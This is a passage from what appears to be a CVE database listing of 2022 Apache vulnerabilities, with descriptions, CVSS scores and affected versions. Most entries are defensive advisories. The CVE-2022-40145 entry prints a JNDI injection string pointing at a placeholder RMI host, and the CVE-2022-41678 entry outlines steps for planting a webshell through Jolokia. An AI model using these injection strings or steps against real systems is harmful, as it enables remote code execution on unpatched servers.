Apache Geode versions up to 1.12.2 and 1.13.2 are vulnerable to a deserialization of untrusted data flaw when using JMX over RMI on Java 11. Any user wishing to protect against deserialization attacks involving JMX or RMI should upgrade to Apache Geode 1.15. Use of 1.15 on Java 11 will automatically protect JMX over RMI against deserialization attacks. This should have no impact on performance since it only affects JMX/RMI which Gfsh uses to communicate with the JMX Manager which is hosted on a Locator.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache geode *
CVE-2022-37023

Apache Geode versions prior to 1.15.0 are vulnerable to a deserialization of untrusted data flaw when using REST API on Java 8 or Java 11. Any user wishing to protect against deserialization attacks involving REST APIs should upgrade to Apache Geode 1.15 and follow the documentation for details on enabling "validate-serializable-objects=true" and specifying any user classes that may be serialized/deserialized with "serializable-object-filter". Enabling "validate-serializable-objects" may impact performance.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache geode *
CVE-2022-37392

Improper Check for Unusual or Exceptional Conditions vulnerability in handling the requests to Apache Traffic Server. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2022-37400

Apache OpenOffice supports the storage of passwords for web connections in the user's configuration database. The stored passwords are encrypted with a single master key provided by the user. A flaw in OpenOffice existed where the required initialization vector for encryption was always the same which weakens the security of the encryption making them vulnerable if an attacker has access to the user's configuration data. This issue affects: Apache OpenOffice versions prior to 4.1.13. Reference: CVE-2022-26306 - LibreOffice

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache openoffice *
CVE-2022-37401

Apache OpenOffice supports the storage of passwords for web connections in the user's configuration database. The stored passwords are encrypted with a single master key provided by the user. A flaw in OpenOffice existed where the master key was poorly encoded, weakening its entropy from 128 to 43 bits and making the stored passwords vulnerable to a brute force attack if an attacker has access to the user's stored config. This issue affects: Apache OpenOffice versions prior to 4.1.13. Reference: CVE-2022-26307 - LibreOffice

Products Affected

Vendor Product Version
apache openoffice *
CVE-2022-37435

Apache ShenYu Admin has insecure permissions, which may allow low-privilege administrators to modify high-privilege administrator's passwords. This issue affects Apache ShenYu 2.4.2 and 2.4.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache shenyu 2.4.2
apache shenyu 2.4.3
CVE-2022-37436

Prior to Apache HTTP Server 2.4.55, a malicious backend can cause the response headers to be truncated early, resulting in some headers being incorporated into the response body. If the later headers have any security purpose, they will not be interpreted by the client.

Products Affected

Vendor Product Version
apache http_server *
CVE-2022-37865

With Apache Ivy 2.4.0 an optional packaging attribute has been introduced that allows artifacts to be unpacked on the fly if they used pack200 or zip packaging. For artifacts using the "zip", "jar" or "war" packaging Ivy prior to 2.5.1 doesn't verify the target path when extracting the archive. An archive containing absolute paths or paths that try to traverse "upwards" using ".." sequences can then write files to any location on the local file system that the user executing Ivy has write access to. Ivy users of version 2.4.0 to 2.5.0 should upgrade to Ivy 2.5.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H 3.9 5.2

Products Affected

Vendor Product Version
apache ivy *
CVE-2022-37866

When Apache Ivy downloads artifacts from a repository it stores them in the local file system based on a user-supplied "pattern" that may include placeholders for artifacts coordinates like the organisation, module or version. If said coordinates contain "../" sequences - which are valid characters for Ivy coordinates in general - it is possible the artifacts are stored outside of Ivy's local cache or repository or can overwrite different artifacts inside of the local cache. In order to exploit this vulnerability an attacker needs collaboration by the remote repository as Ivy will issue http requests containing ".." sequences and a "normal" repository will not interpret them as part of the artifact coordinates. Users of Apache Ivy 2.0.0 to 2.5.1 should upgrade to Ivy 2.5.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache ivy *
CVE-2022-38054

In Apache Airflow versions 2.2.4 through 2.3.3, the `database` webserver session backend was susceptible to session fixation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-38170

In Apache Airflow prior to 2.3.4, an insecure umask was configured for numerous Airflow components when running with the `--daemon` flag which could result in a race condition giving world-writable files in the Airflow home directory and allowing local users to expose arbitrary file contents via the webserver.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N 1.0 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-38362

Apache Airflow Docker's Provider prior to 3.0.0 shipped with an example DAG that was vulnerable to (authenticated) remote execution of code on the Airflow worker host.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache apache-airflow-providers-docker *
CVE-2022-38369

Apache IoTDB version 0.13.0 is vulnerable to a session id attack. Users should upgrade to version 0.13.1 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache iotdb 0.13.0
CVE-2022-38370

Apache IoTDB grafana-connector version 0.13.0 contains an interface without authorization, which may expose the internal structure of database. Users should upgrade to version 0.13.1 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb 0.13.0
CVE-2022-38398

Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to load a url through the jar protocol. This issue affects Apache XML Graphics Batik 1.14.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache batik 1.14
CVE-2022-38648

Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to fetch external resources. This issue affects Apache XML Graphics Batik 1.14.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache batik 1.14
CVE-2022-38649

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Pinot Provider, Apache Airflow allows an attacker to control commands executed in the task execution context, without write access to DAG files. This issue affects Apache Airflow Pinot Provider versions prior to 4.0.0. It also impacts any Apache Airflow versions prior to 2.3.0 in case Apache Airflow Pinot Provider is installed (Apache Airflow Pinot Provider 4.0.0 can only be installed for Airflow 2.3.0+). Note that you need to manually install the Pinot Provider version 4.0.0 in order to get rid of the vulnerability on top of Airflow 2.3.0+ version.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-apache-pinot *
CVE-2022-38745

Apache OpenOffice versions before 4.1.14 may be configured to add an empty entry to the Java class path. This may lead to running arbitrary Java code from the current directory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache openoffice *
CVE-2022-39135

Apache Calcite 1.22.0 introduced the SQL operators EXISTS_NODE, EXTRACT_XML, XML_TRANSFORM and EXTRACT_VALUE, which do not restrict XML External Entity references in their configuration, making them vulnerable to a potential XML External Entity (XXE) attack. Therefore any client exposing these operators, typically by using Oracle dialect (the first three) or MySQL dialect (the last one), is affected by this vulnerability (the extent of it will depend on the user under which the application is running). From Apache Calcite 1.32.0 onwards, Document Type Declarations and XML External Entity resolution are disabled on the impacted operators.

Products Affected

Vendor Product Version
apache calcite *
CVE-2022-39198

A deserialization vulnerability existed in dubbo hessian-lite 3.2.12 and its earlier versions, which could lead to malicious code execution. This issue affects Apache Dubbo 2.7.x version 2.7.17 and prior versions; Apache Dubbo 3.0.x version 3.0.11 and prior versions; Apache Dubbo 3.1.x version 3.1.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dubbo 3.1.0
apache dubbo *
CVE-2022-39944

In Apache Linkis <=1.2.0 when used with the MySQL Connector/J, a deserialization vulnerability with possible remote code execution impact exists when an attacker has write access to a database and configures a JDBC EC with a MySQL data source and malicious parameters. Therefore, the parameters in the jdbc url should be blacklisted. Versions of Apache Linkis <= 1.2.0 will be affected. We recommend users to update to 1.3.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2022-40127

A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow versions prior to 2.4.0.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-40145

This vulnerability concerns a potential code injection when an attacker has control of the target LDAP server used in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8.

Products Affected

Vendor Product Version
apache karaf *
CVE-2022-40146

Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache batik 1.14
CVE-2022-40159

** DISPUTED ** This record was originally reported by the oss-fuzz project who failed to consider the security context in which JXPath is intended to be used and failed to contact the JXPath maintainers prior to requesting the CVE allocation. The CVE was then allocated by Google in breach of the CNA rules. After review by the JXPath maintainers, the original report was found to be invalid.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache commons_jxpath *
CVE-2022-40160

** DISPUTED ** This record was originally reported by the oss-fuzz project who failed to consider the security context in which JXPath is intended to be used and failed to contact the JXPath maintainers prior to requesting the CVE allocation. The CVE was then allocated by Google in breach of the CNA rules. After review by the JXPath maintainers, the original report was found to be invalid.

Products Affected

Vendor Product Version
apache commons_jxpath *
CVE-2022-40189

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Pig Provider, Apache Airflow allows an attacker to control commands executed in the task execution context, without write access to DAG files. This issue affects Pig Provider versions prior to 4.0.0. It also impacts any Apache Airflow versions prior to 2.3.0 in case Pig Provider is installed (Pig Provider 4.0.0 can only be installed for Airflow 2.3.0+). Note that you need to manually install the Pig Provider version 4.0.0 in order to get rid of the vulnerability on top of Airflow 2.3.0+ version.

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-apache-pig *
CVE-2022-40308

If anonymous read is enabled, it's possible to read the database file directly without logging in.

Products Affected

Vendor Product Version
apache archiva *
CVE-2022-40309

Users with write permissions to a repository can delete arbitrary directories.

Products Affected

Vendor Product Version
apache archiva *
CVE-2022-40604

In Apache Airflow 2.3.0 through 2.3.4, part of a url was unnecessarily formatted, allowing for possible information extraction.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-40664

In Apache Shiro before 1.10.0, an authentication bypass vulnerability exists when forwarding or including via RequestDispatcher.

Products Affected

Vendor Product Version
apache shiro *
CVE-2022-40705

An Improper Restriction of XML External Entity Reference vulnerability in RPCRouterServlet of Apache SOAP allows an attacker to read arbitrary files over HTTP. This issue affects Apache SOAP version 2.2 and later versions. It is unknown whether previous versions are also affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache soap *
CVE-2022-40743

Improper Input Validation vulnerability for the xdebug plugin in Apache Software Foundation Apache Traffic Server can lead to cross site scripting and cache poisoning attacks. This issue affects Apache Traffic Server: 9.0.0 to 9.1.3. Users should upgrade to 9.1.4 or later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2022-40754

In Apache Airflow 2.3.0 through 2.3.4, there was an open redirect in the webserver's `/confirm` endpoint.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-40954

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Spark Provider, Apache Airflow allows an attacker to read arbitrary files in the task execution context, without write access to DAG files. This issue affects Spark Provider versions prior to 4.0.0. It also impacts any Apache Airflow versions prior to 2.3.0 in case Spark Provider is installed (Spark Provider 4.0.0 can only be installed for Airflow 2.3.0+). Note that you need to manually install the Spark Provider version 4.0.0 in order to get rid of the vulnerability on top of an Airflow 2.3.0+ version that has a lower version of the Spark Provider installed.

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-apache-spark *
CVE-2022-40955

In versions of Apache InLong prior to 1.3.0, an attacker with sufficient privileges to specify MySQL JDBC connection URL parameters and to write arbitrary data to the MySQL database, could cause this data to be deserialized by Apache InLong, potentially leading to Remote Code Execution on the Apache InLong server. Users are advised to upgrade to Apache InLong 1.3.0 or newer.

Products Affected

Vendor Product Version
apache inlong *
CVE-2022-41131

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Hive Provider, Apache Airflow allows an attacker to execute arbitrary commands in the task execution context, without write access to DAG files. This issue affects Hive Provider versions prior to 4.1.0. It also impacts any Apache Airflow versions prior to 2.3.0 in case Hive Provider is installed (Hive Provider 4.1.0 can only be installed for Airflow 2.3.0+). Note that you need to manually install the Hive Provider version 4.1.0 in order to get rid of the vulnerability on top of an Airflow 2.3.0+ version that has a lower version of the Hive Provider installed.

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-apache-hive *
CVE-2022-41137

Apache Hive Metastore (HMS) uses the SerializationUtilities#deserializeObjectWithTypeInformation method when filtering and fetching partitions; this method is unsafe and can lead to Remote Code Execution (RCE) since it allows the deserialization of arbitrary data. In real deployments, the vulnerability can be exploited only by authenticated users/clients that were able to successfully establish a connection to the Metastore. From an API perspective, any code that calls the unsafe method may be vulnerable unless it performs additional pre-checks on the input arguments.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.3 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H 2.8 5.5

Products Affected

Vendor Product Version
apache hive 4.0.0
CVE-2022-41672

In Apache Airflow, prior to version 2.4.1, deactivating a user wouldn't prevent an already authenticated user from being able to continue using the UI or API.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-41678

Once a user is authenticated on Jolokia, they can potentially trigger arbitrary code execution. In detail, in ActiveMQ configurations, Jetty allows org.jolokia.http.AgentServlet to handle requests to /api/jolokia; org.jolokia.http.HttpRequestHandler#handlePostRequest is able to create a JmxRequest through JSONObject and calls org.jolokia.http.HttpRequestHandler#executeRequest. Deeper in the call stack, org.jolokia.handler.ExecHandler#doHandleRequest can be invoked through reflection. This could lead to RCE via various MBeans. One example is unrestricted deserialization in jdk.management.jfr.FlightRecorderMXBeanImpl, which exists on Java versions above 11: 1. Call newRecording. 2. Call setConfiguration, with webshell data hidden in it. 3. Call startRecording. 4. Call the copyTo method. The webshell will be written to a .jsp file. The mitigation is to restrict (by default) the actions authorized on Jolokia, or disable Jolokia. A more restrictive Jolokia configuration has been defined in the default ActiveMQ distribution. We encourage users to upgrade to ActiveMQ distribution versions including the updated Jolokia configuration: 5.16.6, 5.17.4, 5.18.0, 6.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache activemq *
CVE-2022-41703

A vulnerability in the SQL Alchemy connector of Apache Superset allows an authenticated user with read access to a specific database to add subqueries to the WHERE and HAVING fields referencing tables on the same database that the user should not have access to, despite the user having the feature flag "ALLOW_ADHOC_SUBQUERY" disabled (default value). This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-41704

A vulnerability in Batik of Apache XML Graphics allows an attacker to run untrusted Java code from an SVG. This issue affects Apache XML Graphics prior to 1.16. It is recommended to update to version 1.16.

Products Affected

Vendor Product Version
apache batik *
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2022-42009

SpringEL injection in the server agent in Apache Ambari version 2.7.0 to 2.7.6 allows a malicious authenticated user to execute arbitrary code remotely. Users are recommended to upgrade to 2.7.7.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 2.1 5.9

Products Affected

Vendor Product Version
apache ambari *
CVE-2022-42252

If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.

Products Affected

Vendor Product Version
apache tomcat *
CVE-2022-42466

Prior to 2.0.0-M9, it was possible for an end-user to set the value of an editable string property of a domain object to a value that would be rendered unchanged when the value was saved. In particular, the end-user could enter javascript or similar and this would be executed. As of this release, the inputted strings are properly escaped when rendered.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache isis *
apache isis 2.0.0
CVE-2022-42467

When running in prototype mode, the h2 webconsole module (accessible from the Prototype menu) is automatically made available with the ability to directly query the database. It was felt that it is safer to require the developer to explicitly enable this capability. As of 2.0.0-M8, this can now be done using the 'isis.prototyping.h2-console.web-allow-remote-access' configuration property; the web console will be unavailable without setting this configuration. As an additional safeguard, the new 'isis.prototyping.h2-console.generate-random-web-admin-password' configuration parameter (enabled by default) requires that the administrator use a randomly generated password to use the console. The password is printed to the log, as "webAdminPass: xxx" (where "xxx" is the password). To revert to the original behaviour, the administrator would therefore need to set these configuration parameters: isis.prototyping.h2-console.web-allow-remote-access=true isis.prototyping.h2-console.generate-random-web-admin-password=false Note also that the h2 webconsole is never available in production mode, so these safeguards are only to ensure that the webconsole is secured by default also in prototype mode.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache isis *
apache isis 2.0.0
CVE-2022-42468

Apache Flume versions 1.4.0 through 1.10.1 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with an unsafe providerURL. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache flume *
CVE-2022-42735

Improper Privilege Management vulnerability in Apache Software Foundation Apache ShenYu. ShenYu Admin allows low-privilege, low-level administrators to create users with higher privileges than their own. This issue affects Apache ShenYu: 2.5.0. Upgrade to Apache ShenYu 2.5.1 or apply patch https://github.com/apache/shenyu/pull/3958 .

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache shenyu 2.5.0
CVE-2022-42889

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are:

- "script" - execute expressions using the JVM script execution engine (javax.script)
- "dns" - resolve dns records
- "url" - load values from urls, including from remote servers

Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
juniper security_threat_response_manager *
juniper security_threat_response_manager 7.5.0
netapp bluexp -
apache commons_text *
CVE-2022-42890

A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16.

Products Affected

Vendor Product Version
apache batik *
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2022-42920

Apache Commons BCEL has a number of APIs that would normally only allow changing specific class characteristics. However, due to an out-of-bounds writing issue, these APIs can be used to produce arbitrary bytecode. This could be abused in applications that pass attacker-controllable data to those APIs, giving the attacker more control over the resulting bytecode than otherwise expected. Update to Apache Commons BCEL 6.6.0.

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 37
fedoraproject fedora 36
apache commons_bcel *
CVE-2022-43396

In the fix for CVE-2022-24697, a blacklist is used to filter user input commands. But there is a risk of being bypassed. The user can control the command by controlling the kylin.engine.spark-cmd parameter of conf.

Products Affected

Vendor Product Version
apache kylin *
CVE-2022-43670

An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.0 and prior may allow an authenticated remote attacker to perform a reflected cross site scripting (XSS) attack in the taxonomy management feature.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache sling_cms *
CVE-2022-43717

Dashboard rendering does not sufficiently sanitize the content of markdown components leading to possible XSS attack vectors that can be performed by authenticated users with create dashboard permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43718

Upload data forms do not correctly render user input leading to possible XSS attack vectors that can be performed by authenticated users with database connection update permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43719

Two legacy REST API endpoints for approval and request access are vulnerable to cross site request forgery. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43720

An authenticated attacker with write CSS template permissions can create a record with specific HTML tags that will not get properly escaped by the toast message displayed when a user deletes that specific CSS template record. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43721

An authenticated attacker with update datasets permission could change a dataset link to an untrusted site; users could be redirected to this site when clicking on that specific dataset. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-43766

Apache IoTDB version 0.12.2 to 0.12.6, 0.13.0 to 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. Users should upgrade to 0.13.3 which addresses this issue or use a later version of Java to avoid it.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
CVE-2022-43982

In Apache Airflow versions prior to 2.4.2, the "Trigger DAG with config" screen was susceptible to XSS attacks via the `origin` query argument.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-43985

In Apache Airflow versions prior to 2.4.2, there was an open redirect in the webserver's `/confirm` endpoint.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-44621

The Diagnosis Controller lacks parameter validation, so a user may be attacked by command injection via an HTTP request.

Products Affected

Vendor Product Version
apache kylin *
CVE-2022-44635

Apache Fineract allowed an authenticated user to perform remote code execution due to a path traversal vulnerability in a file upload component of Apache Fineract, allowing an attacker to run remote code. This issue affects Apache Fineract version 1.8.0 and prior versions. We recommend users to upgrade to 1.8.1.

Products Affected

Vendor Product Version
apache fineract *
CVE-2022-44644

In Apache Linkis <=1.3.0 when used with the MySQL Connector/J in the data source module, an authenticated attacker could read arbitrary local files by connecting to a rogue MySQL server and setting allowLoadLocalInfile to true in the JDBC parameters. Therefore, the parameters in the JDBC URL should be blacklisted. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users upgrade the version of Linkis to version 1.3.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache linkis *
CVE-2022-44645

In Apache Linkis <=1.3.0 when used with the MySQL Connector/J, a deserialization vulnerability with possible remote code execution impact exists when an attacker has write access to a database and configures a new datasource with a MySQL data source and malicious parameters. Therefore, the parameters in the JDBC URL should be blacklisted. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users to upgrade the version of Linkis to version 1.3.1.

Products Affected

Vendor Product Version
apache linkis *
CVE-2022-44729

Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik. This issue affects Apache XML Graphics Batik: 1.16. On version 1.16, a malicious SVG could trigger loading external resources by default, causing resource consumption or in some cases even information disclosure. Users are recommended to upgrade to version 1.17 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
